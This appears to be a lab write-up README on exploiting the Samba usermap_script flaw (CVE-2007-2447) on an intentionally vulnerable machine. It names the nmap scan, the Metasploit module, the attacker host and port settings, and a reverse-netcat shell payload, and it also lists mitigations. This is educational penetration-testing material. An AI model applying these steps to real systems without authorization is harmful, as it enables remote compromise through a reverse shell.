Hands-on security lab showcasing Samba (SMB) enumeration and exploitation of the usermap_script vulnerability in a controlled environment.
This repository documents the exploitation of a vulnerable Samba service running on ports 139/tcp and 445/tcp.
The target machine was intentionally vulnerable and used for learning and practice purposes only.
The vulnerability allows remote command execution via the username map script feature in older Samba versions.
- Service: Samba (SMB)
- Ports: 139/tcp, 445/tcp
- Version Identified: Samba 3.0.20 (Debian)
- Environment: Lab / CTF machine
nmap -sV -p 139,445 <TARGET-IP>
The username map script option in older Samba versions allows external scripts to be executed for username mapping. Due to improper input validation, attackers can inject system commands, resulting in unauthenticated remote command execution.
Impact:
Remote Code Execution (RCE)
Full system compromise
High-risk legacy vulnerability
The vulnerability was exploited using the Metasploit Framework.
Metasploit Module Used exploit/multi/samba/usermap_script
-
RHOSTS: Target IP
-
LHOST: Attacker IP
-
LPORT: 4444
Payload: cmd/unix/reverse_netcat
After successful exploitation:
-
Reverse shell was obtained
-
Python was used to stabilize the shell
-
Interactive command execution confirmed
-
SMB services are critical attack surfaces
-
Legacy services introduce severe security risks
-
Enumeration is a crucial phase in penetration testing
-
Known vulnerabilities can lead to full compromise
Upgrade Samba to the latest supported version
-
Disable legacy SMB protocols
-
Restrict SMB access using firewalls
-
Monitor SMB traffic and logs
-
Remove unnecessary services
This project was conducted strictly for educational purposes in a controlled lab environment. Unauthorized access or exploitation of systems you do not own is illegal and unethical.
-
CVE-2007-2447
-
Samba Security Advisories
-
Metasploit Framework Documentation